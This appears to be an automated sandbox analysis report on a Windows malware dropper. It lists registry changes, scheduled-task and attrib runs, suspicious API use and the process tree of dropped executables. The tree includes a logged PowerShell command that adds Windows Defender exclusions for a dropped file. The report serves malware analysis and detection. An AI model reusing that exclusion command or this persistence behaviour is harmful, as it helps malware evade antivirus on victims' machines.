| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{37FB52DA-F779-408D-B505-3F83CFBBFC20} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE} | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6F8BD55B-E83D-4A47-85BE-81FFA8057A69}\ = "Google Update Broker Class Factory" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{9465B4B4-5216-4042-9A2C-754D3BCDC410} | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassSvc.1.0\ = "Google Update Legacy On Demand" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\NumMethods | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\VERSIONINDEPENDENTPROGID | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ = "ICoCreateAsyncStatus" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\ = "IPackage" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods\ = "10" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{6F8BD55B-E83D-4A47-85BE-81FFA8057A69}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.PolicyStatusSvc\CurVer\ = "GoogleUpdate.PolicyStatusSvc.1.0" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\psmachine.dll" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\NumMethods | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassSvc.1.0\CLSID\ = "{9465B4B4-5216-4042-9A2C-754D3BCDC410}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E225E692-4B47-4777-9BED-4FD7FE257F0E}\ = "Google Update Core Class" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ = "IAppVersion" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{37FB52DA-F779-408D-B505-3F83CFBBFC20}\InprocHandler32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\psmachine_64.dll" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3COMClassService\ = "Update3COMClass" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\NumMethods\ = "13" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6F8BD55B-E83D-4A47-85BE-81FFA8057A69}\Elevation | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69} | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\NumMethods\ = "41" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4} | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}\VERSIONINDEPENDENTPROGID | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreClass.1\ = "Google Update Core Class" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{37FB52DA-F779-408D-B505-3F83CFBBFC20}\InprocHandler32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\NumMethods\ = "4" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\ = "IAppCommand" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\NumMethods | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Steam.Upgreyd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe
"C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"
C:\Users\Admin\AppData\Local\Temp\is-UV0IP.tmp\utility-inst.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UV0IP.tmp\utility-inst.tmp" /SL5="$901E4,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
"C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-ERL4L.tmp\do.bat""
C:\Users\Admin\AppData\Local\Temp\Files\test-again.exe
"C:\Users\Admin\AppData\Local\Temp\Files\test-again.exe"
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0xa4,0x7ffb2435cc40,0x7ffb2435cc4c,0x7ffb2435cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
